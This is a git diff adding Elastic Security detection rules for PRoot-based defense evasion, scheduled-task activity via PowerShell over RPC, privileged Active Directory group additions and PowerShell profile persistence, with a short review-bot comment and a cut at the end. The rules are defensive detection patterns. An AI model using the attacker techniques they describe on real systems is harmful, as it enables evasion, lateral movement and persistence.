@@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. 
Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Defense Evasion via PRoot", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.parent.name == \"proot\"\n", + "references": [ + "https://proot-me.github.io/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1211", + "name": "Exploitation for Defense Evasion", + "reference": "https://attack.mitre.org/techniques/T1211/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "5c9ec990-37fa-4d5c-abfc-8d432f3dedd0_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json new file mode 100644 index 00000000000..61107459864 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_106.json 
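Review bot: The `description` still reads "to be run.The post-exploitation technique" (missing space after the period), carried over from the `_6` file added in the same commit; `to be run. The post-exploitation technique` would fix it in both. The added `event.type == "start"` clause is also applied to `endgame-*` events matched via `exec_event`; presumably those events populate `event.type` as "start" too, but that is worth confirming, since otherwise the narrowing silently drops Endgame coverage listed in `tags` and `index`.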
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Outbound Scheduled Task Activity via PowerShell", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.ip in (\"127.0.0.1\", \"::1\")]\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "5cd55388-a19c-47c7-8ec4-f41656c2fded_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json new file mode 100644 index 00000000000..5394e915bf5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_107.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks.", + "false_positives": [ + "Legitimate scheduled tasks may be created during installation of new software." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Outbound Scheduled Task Activity via PowerShell", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", + "references": [ + "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.005", + "name": "Scheduled Task", + "reference": "https://attack.mitre.org/techniques/T1053/005/" + } + ] + }, + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "5cd55388-a19c-47c7-8ec4-f41656c2fded_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json new file mode 100644 index 00000000000..ca1197a0ffc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109.json 
@@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Skoetting" + ], + "description": "Identifies a user being added to a privileged group in Active Directory. Privileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Added to Privileged Group", + "note": "## Triage and analysis\n\n### Investigating User Added to Privileged Group in Active Directory\n\nPrivileged accounts and groups in Active Directory are those to which powerful rights, privileges, and permissions are granted that allow them to perform nearly any action in Active Directory and on domain-joined systems.\n\nAttackers can add users to privileged groups to maintain a level of access if their other privileged accounts are uncovered by the security team. 
This allows them to keep operating after the security team discovers abused accounts.\n\nThis rule monitors events related to a user being added to a privileged group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should manage members of this group.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This attack abuses a legitimate Active Directory mechanism, so it is important to determine whether the activity is legitimate, if the administrator is authorized to perform this operation, and if there is a need to grant the account this level of privilege.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If the admin is not aware of the operation, activate your Active Directory incident response plan.\n- If the user does not need the administrator privileges, remove the account from the privileged group.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "iam where winlog.api:\"wineventlog\" and event.action == \"added-member-to-group\" and\n group.name : (\"Admin*\",\n \"Local Administrators\",\n \"Domain Admins\",\n \"Enterprise Admins\",\n \"Backup Admins\",\n \"Schema Admins\",\n \"DnsAdmins\",\n \"Exchange Organization Administrators\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-b--privileged-accounts-and-groups-in-active-directory" + ], + "related_integrations": [ + { + "package": "system", + 
"version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "group.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.api", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json new file mode 100644 index 00000000000..3617915eacf --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_8.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via PowerShell profile", + "note": "## Triage and analysis\n\n### Investigating Persistence via PowerShell profile\n\nPowerShell profiles are scripts executed when PowerShell starts, customizing the user environment. They are commonly used in Windows environments for legitimate purposes, such as setting variables or loading modules. However, adversaries can abuse PowerShell profiles to establish persistence by inserting malicious code that executes each time PowerShell is launched.\n\nThis rule identifies the creation or modification of a PowerShell profile. It does this by monitoring file events on Windows systems, specifically targeting profile-related file paths and names, such as `profile.ps1` and `Microsoft.Powershell_profile.ps1`. By detecting these activities, security analysts can investigate potential abuse of PowerShell profiles for malicious persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Retrive and inspect the PowerShell profile content; look for suspicious DLL imports, collection or persistence capabilities, suspicious functions, encoded or compressed data, suspicious commands, and other potentially malicious characteristics.\n- Identify the process responsible for the PowerShell profile creation/modification. Use the Elastic Defend events to examine all the activity of the subject process by filtering by the process's `process.entity_id`.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that any suspicious command or function were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and the user has business justifications to use PowerShell.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or 
similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Consider enabling and collecting PowerShell logs such as transcription, module, and script block logging, to improve visibility into PowerShell activities.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Users\\\\*\\\\Documents\\\\WindowsPowerShell\\\\*\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\PowerShell\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\*\") and\n file.name : (\"profile.ps1\", \"Microsoft.Powershell_profile.ps1\")\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + 
"Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json new file mode 100644 index 00000000000..752e1d7dca7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_9.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via PowerShell profile", + "note": "## Triage and analysis\n\n### Investigating Persistence via PowerShell profile\n\nPowerShell profiles are scripts executed when PowerShell starts, customizing the user environment. They are commonly used in Windows environments for legitimate purposes, such as setting variables or loading modules. However, adversaries can abuse PowerShell profiles to establish persistence by inserting malicious code that executes each time PowerShell is launched.\n\nThis rule identifies the creation or modification of a PowerShell profile. It does this by monitoring file events on Windows systems, specifically targeting profile-related file paths and names, such as `profile.ps1` and `Microsoft.Powershell_profile.ps1`. By detecting these activities, security analysts can investigate potential abuse of PowerShell profiles for malicious persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Retrive and inspect the PowerShell profile content; look for suspicious DLL imports, collection or persistence capabilities, suspicious functions, encoded or compressed data, suspicious commands, and other potentially malicious characteristics.\n- Identify the process responsible for the PowerShell profile creation/modification. Use the Elastic Defend events to examine all the activity of the subject process by filtering by the process's `process.entity_id`.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that any suspicious command or function were run.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This is a dual-use mechanism, meaning its usage is not inherently malicious. Analysts can dismiss the alert if the script doesn't contain malicious functions or potential for abuse, no other suspicious activity was identified, and the user has business justifications to use PowerShell.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or 
similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n - Consider enabling and collecting PowerShell logs such as transcription, module, and script block logging, to improve visibility into PowerShell activities.\n", + "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n file.path : (\"?:\\\\Users\\\\*\\\\Documents\\\\WindowsPowerShell\\\\*\",\n \"?:\\\\Users\\\\*\\\\Documents\\\\PowerShell\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\*\") and\n file.name : (\"profile.ps1\", \"Microsoft.Powershell_profile.ps1\")\n", + "references": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + 
"Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.013", + "name": "PowerShell Profile", + "reference": "https://attack.mitre.org/techniques/T1546/013/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "5cf6397e-eb91-4f31-8951-9f0eaa755a31_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_107.json new file mode 100644 index 